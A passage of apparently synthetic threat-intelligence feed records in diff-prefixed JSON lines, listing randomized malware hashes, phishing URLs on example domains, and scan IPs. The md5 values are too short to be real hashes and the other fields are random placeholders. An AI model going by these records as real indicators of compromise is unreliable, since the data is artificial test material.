user 761", "maltype": "malware:k1y", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P48760414603/", "source_feed_id": 2198, "date_first": "2020-10-09T18:31:39", "date_last": "2020-10-09T18:31:39", "md5": "cfd9"} +{"confidence": 23, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "15", "update_id": 1772862647, "detail": 
"6rw,g80r1d4sj", "id": 1753194968, "source": "Default Organization", "state": "active", "detail2": "imported by user 680", "maltype": "malware:ixlyb", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P36997562731/", "source_feed_id": 2101, "date_first": "2020-10-09T18:31:43", "date_last": "2020-10-09T18:31:43", "md5": "93daa"} +{"confidence": 0, "itype": "scan_ip", "severity": "high", "classification": "public", "srcip": "192.168.2.219", "country": "DE", "update_id": 2657969647, "detail": "", "id": 3285278133, "source": "Default Organization", "state": "active", "detail2": "imported by user 820", "trusted_circle_ids": "7,390", "lat": 7.3, "maltype": "malware:1u76t", "value_type": "ip", "source_feed_id": 1152, "date_first": "2020-10-09T18:31:49", "date_last": "2020-10-09T18:31:49", "resource_uri": "/api/v1/intelligence/P45121980169/"} +{"confidence": 45, "itype": "phish_url", "severity": "low", "classification": "public", "srcip": "192.168.2.208", "country": "US", "update_id": 2110937414, "detail": "om0z7", "id": 2098390184, "source": "Default Organization", "state": "active", "detail2": "imported by user 894", "url": "http://p9okf0.example.org/jyb3n8f/f55vfyt48?s2n=0t2d", "trusted_circle_ids": "846", "lat": 17.3, "maltype": "malware:hc-wh", "value_type": "url", "source_feed_id": 3354, "date_first": "2020-10-09T18:31:49", "date_last": "2020-10-09T18:31:49", "resource_uri": "/api/v1/intelligence/P33231447204/"} +{"confidence": 34, "itype": "phish_url", "severity": "low", "classification": "private", "srcip": "89.160.20.156", "country": "US", "update_id": 2335801340, "detail": "adeba89", "id": 3367490507, "source": "Default Organization", "state": "active", "detail2": "imported by user 747", "url": "https://fxkeo24m.example.com/y75tg7sw/jnnu9xmc?apus=ob1hnba4", "trusted_circle_ids": "404,574", "lat": 42.9, "maltype": "malware:0ua9", "value_type": "url", "source_feed_id": 959, "date_first": "2020-10-09T18:31:58", "date_last": "2020-10-09T18:31:58", 
"resource_uri": "/api/v1/intelligence/P34959401147/"} +{"confidence": 14, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "422,852,749", "update_id": 1339527388, "detail": "", "id": 1998649659, "source": "Default Organization", "state": "active", "detail2": "imported by user 604", "maltype": "malware:s0anj", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P21831217400/", "source_feed_id": 1405, "date_first": "2020-10-09T18:32:02", "date_last": "2020-10-09T18:32:02", "md5": "b4dd5cf7"} +{"confidence": 85, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "120", "update_id": 1316735853, "detail": "nj3f,a-e8lz", "id": 3005939184, "source": "Default Organization", "state": "active", "detail2": "imported by user 386", "maltype": "malware:hn5uajghq", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P23229581043/", "source_feed_id": 652, "date_first": "2020-10-09T18:32:03", "date_last": "2020-10-09T18:32:03", "md5": "b890cdad"} +{"confidence": 31, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "98,718,828", "update_id": 3243777736, "detail": "", "id": 1900495748, "source": "Default Organization", "state": "active", "detail2": "imported by user 706", "maltype": "malware:3taf", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P35660572297/", "source_feed_id": 506, "date_first": "2020-10-09T18:32:04", "date_last": "2020-10-09T18:32:04", "md5": "817"} +{"confidence": 50, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "959,539", "update_id": 1284922297, "detail": "", "id": 1040883425, "source": "Default Organization", "state": "active", "detail2": "imported by user 222", "maltype": "malware:wsge", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P33297645928/", "source_feed_id": 146, "date_first": "2020-10-09T18:32:08", "date_last": "2020-10-09T18:32:08", 
"md5": "a06b"} +{"confidence": 50, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "820,394,124", "update_id": 1405107391, "detail": "", "id": 1703603090, "source": "Default Organization", "state": "active", "detail2": "imported by user 414", "maltype": "malware:yid8n1", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P25381157923/", "source_feed_id": 294, "date_first": "2020-10-09T18:32:11", "date_last": "2020-10-09T18:32:11", "md5": "ebd6108"} +{"confidence": 6, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "980,386", "update_id": 2194495180, "detail": "", "id": 1393798645, "source": "Default Organization", "state": "active", "detail2": "imported by user 872", "maltype": "malware:aeu2f0", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P34100122259/", "source_feed_id": 1256, "date_first": "2020-10-09T18:32:19", "date_last": "2020-10-09T18:32:19", "md5": "5afe0a"} +{"confidence": 46, "itype": "scan_ip", "severity": "very-high", "classification": "public", "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "country": "CN", "update_id": 2280522298, "detail": "", "id": 3384379889, "source": "Default Organization", "state": "active", "detail2": "imported by user 237", "trusted_circle_ids": "830", "lat": 18.2, "maltype": "malware:w3rx", "value_type": "ip", "source_feed_id": 773, "date_first": "2020-10-09T18:32:30", "date_last": "2020-10-09T18:32:30", "resource_uri": "/api/v1/intelligence/P38445847685/"} +{"confidence": 60, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "437,407", "update_id": 1128332354, "detail": "", "id": 1291701932, "source": "Default Organization", "state": "active", "detail2": "imported by user 317", "maltype": "malware:upf65oc8", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P40886917073/", "source_feed_id": 2980, "date_first": "2020-10-09T18:32:35", "date_last": 
"2020-10-09T18:32:35", "md5": "758a81"} +{"confidence": -1, "itype": "phish_url", "severity": "very-high", "classification": "private", "srcip": "89.160.20.156", "country": "US", "update_id": 2267992225, "detail": "ziqdk", "id": 3279148213, "source": "Default Organization", "state": "active", "detail2": "imported by user 352", "url": "http://ke4ffyj5.example.com/t-9ikyrtt/ai91?s6u=3y1", "trusted_circle_ids": "817,831,29", "lat": 56.4, "maltype": "malware:u0e", "value_type": "url", "source_feed_id": 2315, "date_first": "2020-10-09T18:33:10", "date_last": "2020-10-09T18:33:10", "resource_uri": "/api/v1/intelligence/P37449871811/"} +{"confidence": 42, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "322,410", "update_id": 3812327380, "detail": "", "id": 2138145846, "source": "Default Organization", "state": "active", "detail2": "imported by user 768", "maltype": "malware:-shiotjs", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P24530928152/", "source_feed_id": 837, "date_first": "2020-10-09T18:33:13", "date_last": "2020-10-09T18:33:13", "md5": "c9b4"} +{"confidence": 25, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "695,520", "update_id": 2085432040, "detail": "", "id": 1502954738, "source": "Default Organization", "state": "active", "detail2": "imported by user 148", "maltype": "malware:c8f0r5d4", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P43216360516/", "source_feed_id": 3786, "date_first": "2020-10-09T18:33:14", "date_last": "2020-10-09T18:33:14", "md5": "ad0"} +{"confidence": 56, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "127", "update_id": 3768246717, "detail": "", "id": 2730182815, "source": "Default Organization", "state": "active", "detail2": "imported by user 649", "maltype": "malware:2vsd1miq", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P23842171060/", "source_feed_id": 
2923, "date_first": "2020-10-09T18:33:14", "date_last": "2020-10-09T18:33:14", "md5": "571957"} +{"confidence": -1, "itype": "phish_url", "severity": "high", "classification": "public", "srcip": "192.168.2.154", "country": "US", "update_id": 3498000116, "detail": "73d", "id": 1649793681, "source": "Default Organization", "state": "active", "detail2": "imported by user 132", "url": "https://rl27d.example.net/ko6/4rtt?b12=o4mgzz2kk", "trusted_circle_ids": "715,176,824", "lat": -17.0, "maltype": "malware:d1q-sdovn", "value_type": "url", "source_feed_id": 1993, "date_first": "2020-10-09T18:33:22", "date_last": "2020-10-09T18:33:22", "resource_uri": "/api/v1/intelligence/P13727067406/"} +{"confidence": 48, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "469", "update_id": 1238197737, "detail": "e3mm2h,knjq-wt", "id": 2195098028, "source": "Default Organization", "state": "active", "detail2": "imported by user 137", "maltype": "malware:886x", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P39956518309/", "source_feed_id": 1936, "date_first": "2020-10-09T18:33:24", "date_last": "2020-10-09T18:33:24", "md5": "7f4"} +{"confidence": 62, "itype": "phish_url", "severity": "high", "classification": "private", "srcip": "89.160.20.156", "country": "US", "update_id": 3547953290, "detail": "rb2my5u7", "id": 2273277634, "source": "Default Organization", "state": "active", "detail2": "imported by user 76", "url": "http://6ygk0y.example.com/t520/4twe?ql4bhkpop=yfpkef", "trusted_circle_ids": "22,143", "lat": 89.1, "maltype": "malware:eem8vy0", "value_type": "url", "source_feed_id": 2583, "date_first": "2020-10-09T18:33:26", "date_last": "2020-10-09T18:33:26", "resource_uri": "/api/v1/intelligence/P28216636081/"} +{"confidence": 47, "itype": "phish_url", "severity": "very-high", "classification": "private", "srcip": "89.160.20.156", "country": "US", "update_id": 3726618139, "detail": "3jujb6j", "id": 1593951372, "source": "Default 
Organization", "state": "active", "detail2": "imported by user 304", "url": "http://rcsr9o.example.net/e6f/08b?8d2y=d-42fr-", "trusted_circle_ids": "281", "lat": 49.1, "maltype": "malware:lrfqa", "value_type": "url", "source_feed_id": 1922, "date_first": "2020-10-09T18:33:27", "date_last": "2020-10-09T18:33:27", "resource_uri": "/api/v1/intelligence/P18416887501/"} +{"confidence": -1, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "873,450,588", "update_id": 2444963851, "detail": "f7ciq9,2uu9b", "id": 2881597176, "source": "Default Organization", "state": "active", "detail2": "imported by user 578", "maltype": "malware:wpo", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P37162617510/", "source_feed_id": 1312, "date_first": "2020-10-09T18:33:29", "date_last": "2020-10-09T18:33:29", "md5": "89a0a684"} +{"confidence": 51, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "551,299,501", "update_id": 3210446946, "detail": "", "id": 1789877636, "source": "Default Organization", "state": "active", "detail2": "imported by user 347", "maltype": "malware:f7l", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P15884312830/", "source_feed_id": 1250, "date_first": "2020-10-09T18:33:43", "date_last": "2020-10-09T18:33:43", "md5": "a41f"} +{"confidence": 56, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "460,122,615", "update_id": 2994196701, "detail": "kpjt,f5c6pl", "id": 1300434967, "source": "Default Organization", "state": "active", "detail2": "imported by user 182", "maltype": "malware:5kjd", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P44427200974/", "source_feed_id": 1603, "date_first": "2020-10-09T18:33:45", "date_last": "2020-10-09T18:33:45", "md5": "d0f5f32"} +{"confidence": 79, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "804", "update_id": 2396481494, 
"detail": "", "id": 2448066635, "source": "Default Organization", "state": "active", "detail2": "imported by user 976", "maltype": "malware:7x9cgytj", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P15169037907/", "source_feed_id": 814, "date_first": "2020-10-09T18:33:45", "date_last": "2020-10-09T18:33:45", "md5": "4f984375b"} +{"confidence": 15, "itype": "phish_url", "severity": "medium", "classification": "public", "srcip": "192.168.2.115", "country": "US", "update_id": 1425004305, "detail": "5w8i", "id": 1693329110, "source": "Default Organization", "state": "active", "detail2": "imported by user 408", "url": "https://cc7d.example.com/kxxwobg/hd6omn?tr8=essb", "trusted_circle_ids": "374,301", "lat": -49.1, "maltype": "malware:1l5tib0", "value_type": "url", "source_feed_id": 3431, "date_first": "2020-10-09T18:33:48", "date_last": "2020-10-09T18:33:48", "resource_uri": "/api/v1/intelligence/P46598563676/"} +{"confidence": 35, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "989,396,27", "update_id": 3573181354, "detail": "", "id": 1522150430, "source": "Default Organization", "state": "active", "detail2": "imported by user 843", "maltype": "malware:8-8a", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P28645937174/", "source_feed_id": 2342, "date_first": "2020-10-09T18:33:51", "date_last": "2020-10-09T18:33:51", "md5": "9c67037e6"} +{"confidence": 71, "itype": "scan_ip", "severity": "very-high", "classification": "private", "srcip": "192.168.2.61", "country": "VN", "update_id": 1253389383, "detail": "f3ctz7j", "id": 1760436567, "source": "Default Organization", "state": "active", "detail2": "imported by user 831", "trusted_circle_ids": "342,504", "lat": -40.8, "maltype": "malware:vy02k4", "value_type": "ip", "source_feed_id": 271, "date_first": "2020-10-09T18:33:57", "date_last": "2020-10-09T18:33:57", "resource_uri": "/api/v1/intelligence/P14276852864/"} +{"confidence": 85, "itype": "scan_ip", 
"severity": "very-high", "classification": "public", "srcip": "192.168.2.233", "country": "DE", "update_id": 1098288836, "detail": "", "id": 1925240476, "source": "Default Organization", "state": "active", "detail2": "imported by user 650", "trusted_circle_ids": "51", "lat": -27.4, "maltype": "malware:2bnikxoma", "value_type": "ip", "source_feed_id": 1067, "date_first": "2020-10-09T18:34:00", "date_last": "2020-10-09T18:34:00", "resource_uri": "/api/v1/intelligence/P15033658538/"} +{"confidence": 91, "itype": "phish_url", "severity": "very-high", "classification": "private", "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "country": "US", "update_id": 2722308334, "detail": "v9ycq", "id": 3001806953, "source": "Default Organization", "state": "active", "detail2": "imported by user 489", "url": "http://v9aqrp81q.example.net/psuj4bs/rvp?qufy=ymryh", "trusted_circle_ids": "484", "lat": 39.9, "maltype": "malware:ak63t", "value_type": "url", "source_feed_id": 782, "date_first": "2020-10-09T18:34:00", "date_last": "2020-10-09T18:34:00", "resource_uri": "/api/v1/intelligence/P34696300225/"} +{"confidence": -1, "itype": "scan_ip", "severity": "very-high", "classification": "public", "srcip": "192.168.2.234", "country": "IN", "update_id": 3520784497, "detail": "", "id": 3933431319, "source": "Default Organization", "state": "active", "detail2": "imported by user 453", "trusted_circle_ids": "444", "lat": -52.2, "maltype": "malware:ejrypgr", "value_type": "ip", "source_feed_id": 1904, "date_first": "2020-10-09T18:34:00", "date_last": "2020-10-09T18:34:00", "resource_uri": "/api/v1/intelligence/P46019487828/"} +{"confidence": 95, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "743,936", "update_id": 3707298072, "detail": "xva1ki,qxwn7lw", "id": 1356788940, "source": "Default Organization", "state": "active", "detail2": "imported by user 722", "maltype": "malware:q4a", "value_type": "md5", "resource_uri": 
"/api/v1/intelligence/P30118085912/", "source_feed_id": 3698, "date_first": "2020-10-09T18:34:02", "date_last": "2020-10-09T18:34:02", "md5": "a4fa"} +{"confidence": 6, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "948,642,50", "update_id": 3749914856, "detail": "r81f4,wwsw", "id": 3804309005, "source": "Default Organization", "state": "active", "detail2": "imported by user 236", "maltype": "malware:2sclqws1s", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P14689465586/", "source_feed_id": 342, "date_first": "2020-10-09T18:34:05", "date_last": "2020-10-09T18:34:05", "md5": "5e11299"} +{"confidence": 15, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "1", "update_id": 1637146862, "detail": "", "id": 1022859708, "source": "Default Organization", "state": "active", "detail2": "imported by user 488", "maltype": "malware:9cfecc", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P33092174596/", "source_feed_id": 2811, "date_first": "2020-10-09T18:34:11", "date_last": "2020-10-09T18:34:11", "md5": "22315f8"} +{"confidence": 54, "itype": "mal_md5", "severity": "high", "classification": "public", "trusted_circle_ids": "810,910", "update_id": 1671617316, "detail": "", "id": 1581368214, "source": "Default Organization", "state": "active", "detail2": "imported by user 310", "maltype": "malware:r7vbej", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P28408487114/", "source_feed_id": 1371, "date_first": "2020-10-09T18:34:12", "date_last": "2020-10-09T18:34:12", "md5": "d4a"} +{"confidence": -1, "itype": "phish_url", "severity": "low", "classification": "public", "srcip": "89.160.20.156", "country": "US", "update_id": 2477226249, "detail": "gry2doqf", "id": 3576055846, "source": "Default Organization", "state": "active", "detail2": "imported by user 376", "url": "https://o4kqv8b8.example.net/gm4d-9gt/v2iqt?x65ry67ao=skta9rp", "trusted_circle_ids": 
"660", "lat": 14.2, "maltype": "malware:0qqrz", "value_type": "url", "source_feed_id": 1808, "date_first": "2020-10-09T18:34:17", "date_last": "2020-10-09T18:34:17", "resource_uri": "/api/v1/intelligence/P27429039546/"} +{"confidence": 89, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "954,19,6", "update_id": 1760504719, "detail": "1l9tule2,k6p", "id": 1315247197, "source": "Default Organization", "state": "active", "detail2": "imported by user 748", "maltype": "malware:r38g5hbgx", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P15092591036/", "source_feed_id": 206, "date_first": "2020-10-09T18:34:20", "date_last": "2020-10-09T18:34:20", "md5": "3eac"} +{"confidence": 25, "itype": "mal_md5", "severity": "high", "classification": "public", "trusted_circle_ids": "392,581", "update_id": 2530088908, "detail": "d9qquxe,ulx", "id": 1562423716, "source": "Default Organization", "state": "active", "detail2": "imported by user 380", "maltype": "malware:882dlx", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P35184012550/", "source_feed_id": 3446, "date_first": "2020-10-09T18:34:20", "date_last": "2020-10-09T18:34:20", "md5": "59893613"} +{"confidence": 4, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "591,848,663", "update_id": 1937893007, "detail": "wsu7l1,zrb", "id": 1470897088, "source": "Default Organization", "state": "active", "detail2": "imported by user 423", "maltype": "malware:rwo6s", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P10368659748/", "source_feed_id": 599, "date_first": "2020-10-09T18:34:32", "date_last": "2020-10-09T18:34:32", "md5": "5facf1f"} +{"confidence": 9, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "299", "update_id": 3858315866, "detail": "", "id": 1205553827, "source": "Default Organization", "state": "active", "detail2": "imported by user 983", "maltype": 
"malware:-pbnrmv", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P41514908414/", "source_feed_id": 3751, "date_first": "2020-10-09T18:34:32", "date_last": "2020-10-09T18:34:32", "md5": "708b2c"} +{"confidence": -1, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "556", "update_id": 2655715062, "detail": "", "id": 1744295971, "source": "Default Organization", "state": "active", "detail2": "imported by user 314", "maltype": "malware:uqw", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P36955243007/", "source_feed_id": 2305, "date_first": "2020-10-09T18:34:39", "date_last": "2020-10-09T18:34:39", "md5": "0df"} +{"confidence": 45, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "445", "update_id": 2172945223, "detail": "ps2,qr2wno4", "id": 1782793990, "source": "Default Organization", "state": "active", "detail2": "imported by user 986", "maltype": "malware:mkctzuaaf", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P41751433270/", "source_feed_id": 3513, "date_first": "2020-10-09T18:34:40", "date_last": "2020-10-09T18:34:40", "md5": "770"} +{"confidence": 98, "itype": "scan_ip", "severity": "medium", "classification": "public", "srcip": "192.168.2.88", "country": "VN", "update_id": 1575621349, "detail": "", "id": 1130190904, "source": "Default Organization", "state": "active", "detail2": "imported by user 615", "trusted_circle_ids": "88", "lat": -79.4, "maltype": "malware:3zu2d2", "value_type": "ip", "source_feed_id": 1192, "date_first": "2020-10-09T18:34:41", "date_last": "2020-10-09T18:34:41", "resource_uri": "/api/v1/intelligence/P13755730530/"} +{"confidence": 17, "itype": "phish_url", "severity": "medium", "classification": "public", "srcip": "89.160.20.156", "country": "US", "update_id": 2450069481, "detail": "ao6", "id": 2499059829, "source": "Default Organization", "state": "active", "detail2": "imported by user 202", "url": 
"https://91p0p.example.com/easx3j6iy/xvnchuoa?dvkljl=h21", "trusted_circle_ids": "308,949", "lat": 84.6, "maltype": "malware:86-jrf6o", "value_type": "url", "source_feed_id": 852, "date_first": "2020-10-09T18:34:43", "date_last": "2020-10-09T18:34:43", "resource_uri": "/api/v1/intelligence/P43937262060/"} +{"confidence": 67, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "776", "update_id": 3951093865, "detail": "", "id": 2799251412, "source": "Default Organization", "state": "active", "detail2": "imported by user 421", "maltype": "malware:91o2", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P31632809876/", "source_feed_id": 3756, "date_first": "2020-10-09T18:34:48", "date_last": "2020-10-09T18:34:48", "md5": "f9edba87a"} +{"confidence": 22, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "35", "update_id": 3046847198, "detail": "", "id": 3711409360, "source": "Default Organization", "state": "active", "detail2": "imported by user 807", "maltype": "malware:yakt8pe9r", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P37263483140/", "source_feed_id": 3903, "date_first": "2020-10-09T18:34:53", "date_last": "2020-10-09T18:34:53", "md5": "c3b497"} +{"confidence": 20, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "196,775", "update_id": 2946803375, "detail": "", "id": 3346530445, "source": "Default Organization", "state": "active", "detail2": "imported by user 298", "maltype": "malware:jfje", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P10248765051/", "source_feed_id": 1239, "date_first": "2020-10-09T18:34:53", "date_last": "2020-10-09T18:34:53", "md5": "ec57713c"} +{"confidence": -1, "itype": "phish_url", "severity": "high", "classification": "public", "srcip": "89.160.20.156", "country": "US", "update_id": 1687817836, "detail": "-g6", "id": 2804727563, "source": "Default Organization", "state": 
"active", "detail2": "imported by user 345", "url": "https://lzr6.example.org/a7og/4vpv?e7k5=wun", "trusted_circle_ids": "793,131", "lat": -16.1, "maltype": "malware:c7e", "value_type": "url", "source_feed_id": 2617, "date_first": "2020-10-09T18:34:54", "date_last": "2020-10-09T18:34:54", "resource_uri": "/api/v1/intelligence/P11093591971/"} +{"confidence": 84, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "30", "update_id": 2339220849, "detail": "", "id": 2229747614, "source": "Default Organization", "state": "active", "detail2": "imported by user 747", "maltype": "malware:0d7cxf", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P12084157836/", "source_feed_id": 1620, "date_first": "2020-10-09T18:34:55", "date_last": "2020-10-09T18:34:55", "md5": "bde"} +{"confidence": 54, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "908", "update_id": 2083515068, "detail": "", "id": 2821279948, "source": "Default Organization", "state": "active", "detail2": "imported by user 832", "maltype": "malware:-farvj0e", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P43981956471/", "source_feed_id": 2038, "date_first": "2020-10-09T18:35:01", "date_last": "2020-10-09T18:35:01", "md5": "aa674f5f"} +{"confidence": 63, "itype": "mal_md5", "severity": "high", "classification": "public", "trusted_circle_ids": "207,993,501", "update_id": 3429396478, "detail": "", "id": 3118884222, "source": "Default Organization", "state": "active", "detail2": "imported by user 217", "maltype": "malware:23xfw4nyi", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P20451120036/", "source_feed_id": 1492, "date_first": "2020-10-09T18:35:01", "date_last": "2020-10-09T18:35:01", "md5": "48721c98"} +{"confidence": 72, "itype": "phish_url", "severity": "low", "classification": "public", "srcip": "89.160.20.156", "country": "US", "update_id": 3320773285, "detail": "y7d71", "id": 3912225830, 
"source": "Default Organization", "state": "active", "detail2": "imported by user 402", "url": "http://932.example.com/1xmdjyom/tf3inx1?s6zgr=ajgw", "trusted_circle_ids": "439", "lat": -57.9, "maltype": "malware:dto", "value_type": "url", "source_feed_id": 1594, "date_first": "2020-10-09T18:35:04", "date_last": "2020-10-09T18:35:04", "resource_uri": "/api/v1/intelligence/P16185398807/"} +{"confidence": 34, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "669", "update_id": 2275758319, "detail": "nknea,hlq", "id": 2591984894, "source": "Default Organization", "state": "active", "detail2": "imported by user 626", "maltype": "malware:7nq6far", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P19612019110/", "source_feed_id": 1579, "date_first": "2020-10-09T18:35:06", "date_last": "2020-10-09T18:35:06", "md5": "114bd63e0"} +{"confidence": 53, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "835,850", "update_id": 2399518196, "detail": "", "id": 2589012476, "source": "Default Organization", "state": "active", "detail2": "imported by user 756", "maltype": "malware:c1z0qya", "value_type": "md5", "resource_uri": "/api/v1/intelligence/P47658489795/", "source_feed_id": 3665, "date_first": "2020-10-09T18:35:22", "date_last": "2020-10-09T18:35:22", "md5": "636cd4267"} +{"confidence": 57, "itype": "mal_url", "severity": "low", "classification": "private", "srcip": "89.160.20.156", "country": "US", "update_id": 3342338979, "detail": "first_seen=2020-11-24T05:32:17,IP=192.168.2.45,5z6,0p0m1,mask=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6,popularity=high", "id": 2677187012, "source": "Default Organization", "state": "active", "detail2": "imported by user 893", "url": "https://0te9x75e.example.net/y2cbl5ov5/u-s9?vhppw120=bt0ze0du3", "trusted_circle_ids": "234,909", "lat": -45.9, "maltype": "malware:qtp", "value_type": "url", "source_feed_id": 3395, "date_first": "2020-10-09T18:44:01", 
"date_last": "2020-10-09T18:44:01", "resource_uri": "/api/v1/intelligence/P28161033466/"} +{"confidence": 31, "itype": "phish_url", "severity": "medium", "classification": "private", "srcip": "89.160.20.156", "country": "US", "update_id": 1484831936, "detail": "06epx", "id": 3137219963, "source": "Default Organization", "state": "active", "detail2": "imported by user 450", "url": "http://b7qdtnl8f.example.org/z2a-tx3ip/7cv?9a67ct3mb=ijse", "trusted_circle_ids": "755,843,943", "lat": -36.1, "maltype": "malware:nosy8", "value_type": "url", "source_feed_id": 2108, "date_first": "2020-10-09T18:44:04", "date_last": "2020-10-09T18:44:04", "resource_uri": "/api/v1/intelligence/P33588463803/"} +{"confidence": 19, "itype": "mal_domain", "severity": "very-high", "classification": "private", "trusted_circle_ids": "63,324", "update_id": 1826833096, "detail": "n5okkr7mg,jjz8e", "id": 2506436592, "source": "Default Organization", "state": "active", "detail2": "imported by user 479", "domain": "4gtq1n.example.net", "maltype": "malware:4okr", "value_type": "domain", "source_feed_id": 393, "date_first": "2020-10-09T18:44:19", "date_last": "2020-10-09T18:44:19", "resource_uri": "/api/v1/intelligence/P42606732542/"} +{"confidence": 83, "itype": "mal_ip", "severity": "very-high", "classification": "public", "srcip": "192.168.2.17", "country": "RU", "update_id": 2101635974, "detail": "first_seen=2020-02-14T13:46:51,IP=89.160.20.156,gnz6,u96h,mask=89.160.20.156,popularity=high", "id": 1214135687, "source": "Default Organization", "state": "active", "detail2": "imported by user 969", "trusted_circle_ids": "474,324", "lat": -68.4, "maltype": "malware:h68c70o", "value_type": "ip", "source_feed_id": 425, "date_first": "2020-10-09T18:44:27", "date_last": "2020-10-09T18:44:27", "resource_uri": "/api/v1/intelligence/P25206292349/"} +{"confidence": 15, "itype": "phish_url", "severity": "very-high", "classification": "private", "srcip": "192.168.2.183", "country": "US", "update_id": 1949050295, 
"detail": "t37z5d2", "id": 1632578144, "source": "Default Organization", "state": "active", "detail2": "imported by user 501", "url": "https://tfva.example.org/iih3qkj/b04g7?dwosh0qmt=wi9ao", "trusted_circle_ids": "615,818", "lat": 37.5, "maltype": "malware:y9xovpr2", "value_type": "url", "source_feed_id": 1114, "date_first": "2020-10-09T18:44:35", "date_last": "2020-10-09T18:44:35", "resource_uri": "/api/v1/intelligence/P21633460934/"} +{"confidence": 85, "itype": "phish_url", "severity": "medium", "classification": "public", "srcip": "89.160.20.156", "country": "US", "update_id": 2645963867, "detail": "rprsi-", "id": 3098969355, "source": "Default Organization", "state": "active", "detail2": "imported by user 149", "url": "https://erg2.example.com/4ys/vywa93c?7oru=evpi", "trusted_circle_ids": "597,946,913", "lat": -34.5, "maltype": "malware:wxbuhcov9", "value_type": "url", "source_feed_id": 398, "date_first": "2020-10-09T18:44:36", "date_last": "2020-10-09T18:44:36", "resource_uri": "/api/v1/intelligence/P30134520108/"} +{"confidence": 64, "itype": "mal_url", "severity": "low", "classification": "private", "srcip": "89.160.20.156", "country": "IN", "update_id": 2806149730, "detail": "first_seen=2020-12-24T20:20:31,IP=89.160.20.156,gogpcno,-jj,mask=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6,popularity=low", "id": 2035701780, "source": "Default Organization", "state": "active", "detail2": "imported by user 59", "url": "https://0elz6c.example.com/3nhx/cadsn6?kfcj94=gnl", "trusted_circle_ids": "600,673,990", "lat": -54.6, "maltype": "malware:xn2a", "value_type": "url", "source_feed_id": 2760, "date_first": "2020-10-09T18:44:37", "date_last": "2020-10-09T18:44:37", "resource_uri": "/api/v1/intelligence/P10508749376/"} +{"confidence": 44, "itype": "phish_url", "severity": "medium", "classification": "public", "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "country": "US", "update_id": 3490786662, "detail": "qztcai", "id": 2120958409, "source": "Default Organization", 
